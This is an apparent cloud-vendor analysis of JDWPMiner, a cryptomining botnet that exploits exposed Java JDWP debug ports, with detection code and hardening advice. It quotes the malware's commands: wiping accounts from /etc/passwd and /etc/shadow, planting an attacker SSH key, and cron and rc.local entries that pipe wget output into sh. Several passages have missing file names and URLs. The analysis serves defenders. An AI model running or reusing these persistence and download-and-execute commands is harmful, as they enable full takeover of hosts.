Analysis of JDWPMiner Mining Trojan: Remote Debugging with Java Causes Hidden Risks

Recently, the Alibaba Cloud Security Team detected a malicious mining attack that exploits the remote code execution (RCE) vulnerability of JDWP. JDWP is widely used in the development and debugging of Java applications, and Java itself is widely used to build e-commerce, office, CMS, and other platforms that are closely tied to daily life. If remote debugging is not turned off when the software is released, a major hidden risk is left behind. JDWPMiner exploits this feature for profit.

Alibaba Cloud security experts found that the botnet exploits the Java Debug RCE to download mining binaries from a malicious download source and start mining. It then persists through crontab, writes an SSH public key to authorized_keys to retain remote access, and tries four methods of bouncing a shell to take full control of the host, causing serious harm to user assets.

Alibaba Cloud Security continuously monitors this bot and has found that its spread has increased recently. Users are advised to take defensive measures against it.

Means of Spread

Phase Analysis

Protocol Analysis

The Java Debug Wire Protocol (JDWP) is the communication protocol between a debugger and the target JVM. In the JPDA (Java Platform Debugger Architecture) system, JDWP describes the format of the data exchanged between the front-end debugger and the back-end debuggee. The protocol defines the request commands, response data, and error codes in detail so that the JVMTI-based back end and JDI clients can communicate. Through this protocol, the debugger can obtain values from the VM, including classes, objects, and threads.

JDWP is a TCP-based binary packet protocol that communicates through command packets and reply packets. The Flags field indicates whether a packet is a command or a reply, and the Command Set field defines the command category.

To enable the protocol, users usually need to modify or in the bin directory of the apache-tomcat installation package. There are two transport methods: dt_shmem for local debugging and dt_socket for remote debugging.

It can also be enabled through the command line:

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

The JDWP protocol carries no authentication information. Therefore, anyone who can reach the debug port of a Java application can debug that application with JDWP, which brings great risk to development and O&M. JDWPMiner uses this feature for profitable intrusion.

Intrusion Analysis

Either of the preceding two methods can result in the JDWP port being opened to the public network. JDWPMiner exploits the JDWP RCE vulnerability by calling wget from the parent Java process:

java -server -Xms256m -Xmx2048m -XX:MaxPermSize=256m -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

Execute the following command:


The script has four ways of bouncing a shell: python, perl, nc, and bash. The script's C2 is hosted in Luxembourg. Once the shell is executed, the host is completely taken over by JDWPMiner.

Then, the call to will be executed in a different way.

wget -O-

Remove the accounts eth0, eth1, sudev, and system from /etc/passwd and /etc/shadow with sed:

sed -i 's/^eth0:.*//' /etc/passwd 2>/dev/null;
sed -i 's/^eth0:.*//' /etc/shadow 2>/dev/null;
sed -i 's/^eth1:.*//' /etc/passwd 2>/dev/null;
sed -i 's/^eth1:.*//' /etc/shadow 2>/dev/null;
sed -i 's/^sudev:.*//' /etc/passwd 2>/dev/null;
sed -i 's/^sudev:.*//' /etc/shadow 2>/dev/null;
sed -i 's/^system:.*//' /etc/passwd 2>/dev/null;
sed -i 's/^system:.*//' /etc/shadow 2>/dev/null;

Add the public key to /root/.ssh/authorized_keys:

# add ssh key
grep Glock /root/.ssh/authorized_keys || echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock' >> /root/.ssh/authorized_keys;
chmod 755 /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;
chown root:root /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;

Persist with crontab:

# Add To Crontab
grep m247 /var/spool/cron/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/root
grep m247 /var/spool/cron/crontabs/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/crontabs/root
grep m247 /etc/crontab || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/crontab
grep m247 /etc/cron.d/0hourly || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/cron.d/0hourly

Persist with cron.d (hourly, daily, weekly, and monthly jobs, each made immutable with chattr +i):

# Add to Cron.d
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;chattr +i /etc/cron.hourly/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;chattr +i /etc/cron.daily/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;chattr +i /etc/cron.weekly/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;chattr +i /etc/cron.monthly/0;

Persist with rc.local, choosing the file path according to the distribution:

if [[ -e /etc/debian_version ]]; then
    RCLOCAL='/etc/rc.local';
    echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;
elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; then
    RCLOCAL='/etc/rc.d/rc.local'
    echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;chmod +x $RCLOCAL;
else
    echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;
fi

Download the mining Trojan with curl or wget:

curl -s || wget --quiet -O /dev/null
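A host-side audit for the persistence artifacts left by the crontab, cron.d, rc.local, and authorized_keys steps above, added here as an example; it is not part of the original analysis. It assumes a Linux host with lsattr available and reuses the paths, the "wget --quiet -O- ... | sh" pattern, and the 'm247' and 'Glock' strings that the script itself greps for as its markers.

```python
import os
import re
import subprocess

# Files the script above writes to (paths taken from the script; extend as needed).
PERSISTENCE_PATHS = [
    "/var/spool/cron/root", "/var/spool/cron/crontabs/root", "/etc/crontab",
    "/etc/cron.d/0hourly", "/etc/cron.hourly/0", "/etc/cron.daily/0",
    "/etc/cron.weekly/0", "/etc/cron.monthly/0", "/etc/rc.local", "/etc/rc.d/rc.local",
]
AUTH_KEYS = "/root/.ssh/authorized_keys"
# A silent wget piped straight into sh, as in every cron and rc entry the script drops.
PIPE_TO_SH = re.compile(r"wget\s+--quiet\s+-O-.*\|\s*sh\b")
# The appended key is recognised by its comment (the script greps for 'Glock').
GLOCK_KEY = re.compile(r"^ssh-rsa\s+\S+\s+root@Glock\s*$", re.M)

def scan_text(path, text):
    """Return (path, indicator) tuples for the indicators present in one file's text."""
    hits = []
    if PIPE_TO_SH.search(text):
        hits.append((path, "download-and-execute entry (wget ... | sh)"))
    if "m247" in text:
        hits.append((path, "'m247' marker the script uses to detect itself"))
    if path == AUTH_KEYS and GLOCK_KEY.search(text):
        hits.append((path, "JDWPMiner SSH key (root@Glock)"))
    return hits

def is_immutable(path):
    """True if lsattr shows the 'i' flag; the script runs chattr +i on its cron jobs."""
    try:
        out = subprocess.run(["lsattr", "-d", path], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return False
    return "i" in out.split()[0]

def audit(paths=None):
    """Scan the persistence locations on this host and return every finding."""
    hits = []
    for p in (paths or PERSISTENCE_PATHS + [AUTH_KEYS]):
        if not os.path.isfile(p):
            continue
        if p.startswith("/etc/cron.") and p.endswith("/0"):
            hits.append((p, "cron job named '0', as dropped by the script"))
        with open(p, errors="replace") as f:
            hits += scan_text(p, f.read())
        if is_immutable(p):
            hits.append((p, "immutable attribute set (chattr +i)"))
    return hits
```

Call audit() as root and treat any finding as a reason to image the host before cleaning, since the immutable flag must be cleared with chattr -i before the cron files can be removed.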

Security Recommendations

Verification Methods

  • Local verification: run the following command. If any line is returned, a Debug port is enabled.

ps -ef | grep jdwp | grep -v 'grep'

  • Remote verification: after connecting to the port with telnet, enter JDWP-Handshake. If JDWP-Handshake is echoed back, the port is exposed and the vulnerability exists.

{ echo "JDWP-Handshake"; sleep 20; } | telnet remote_host remote_port
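The same remote check done from Python, added here as an example rather than taken from the original post: it performs the handshake, then sends one VirtualMachine/Version command and parses the reply using the command/reply packet layout described in the protocol analysis above. The host and port of the asset being checked are supplied by the caller.

```python
import socket
import struct

HANDSHAKE = b"JDWP-Handshake"
# 11-byte big-endian header: length(4) id(4) flags(1), then command set(1)+command(1)
# for a command packet, or a 2-byte error code for a reply packet (flags bit 0x80 set).
HEADER = struct.Struct(">IIBBB")

def build_command(pkt_id, command_set, command, data=b""):
    # flags=0 marks a command packet; length covers header and data
    return HEADER.pack(HEADER.size + len(data), pkt_id, 0, command_set, command) + data

def parse_header(buf):
    """Decode a packet header; a reply carries an error code instead of set/command."""
    length, pkt_id, flags, b1, b2 = HEADER.unpack_from(buf)
    if flags & 0x80:
        return {"length": length, "id": pkt_id, "reply": True, "error": (b1 << 8) | b2}
    return {"length": length, "id": pkt_id, "reply": False, "command_set": b1, "command": b2}

def read_string(data):
    """A JDWP string is a 4-byte length followed by that many UTF-8 bytes."""
    (n,) = struct.unpack_from(">I", data)
    return data[4:4 + n].decode("utf-8", "replace"), data[4 + n:]

def parse_version_reply(body):
    """VirtualMachine/Version reply: description, jdwpMajor, jdwpMinor, vmVersion, vmName."""
    description, rest = read_string(body)
    major, minor = struct.unpack_from(">ii", rest)
    vm_version, rest = read_string(rest[8:])
    vm_name, _ = read_string(rest)
    return {"description": description, "jdwp": (major, minor), "vm_version": vm_version, "vm_name": vm_name}

def recv_exact(sock, n):
    buf = b""  # TCP may split one packet across several reads
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-packet")
        buf += chunk
    return buf

def check_jdwp(host, port, timeout=5.0):
    # None if host:port does not complete the handshake, else exposed=True plus VM details
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        if recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
            return None
        s.sendall(build_command(1, 1, 1))  # VirtualMachine command set 1, Version command 1
        hdr = parse_header(recv_exact(s, HEADER.size))
        body = recv_exact(s, hdr["length"] - HEADER.size)
        if not hdr["reply"] or hdr["error"] != 0:
            return {"exposed": True, "error": hdr.get("error")}
        return {"exposed": True, **parse_version_reply(body)}
```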


  1. Search for or, and comment out the line containing transport=dt_socket.
  2. If running in Docker, change ENV JPDA_ENABLE=1 to 0 in the Dockerfile.

Detailed Security Recommendations

1. Close the JDWP port or block it from the Internet. If debugging is performed in a staging environment, disable Debug mode after it is finished.

2. Disable the Java Debug mode.

3. Cloud Firewall monitors newly emerging RCE vulnerabilities on the Internet in real time using big data. The overall time from RCE disclosure to response is less than three hours, which effectively stops customer assets from being attacked through RCE vulnerabilities. It supports layer 3 to layer 7 protocols, covering HTTP protection for websites and layer-4 defense for a large number of TCP/UDP protocols. By default, the current version of Cloud Firewall defends against the remote command execution vulnerability of the Java debugging interface.

4. Cloud Firewall's intelligent policies can be customized based on historical traffic to provide best practices for reducing the exposed attack surface in line with the customer's business. Users can minimize the Internet exposure of their assets through one-click delivery or manual selection. This avoids the risk of inappropriately exposing JDWP ports to the outside world and blocks scanning by cyberspace mapping tools.





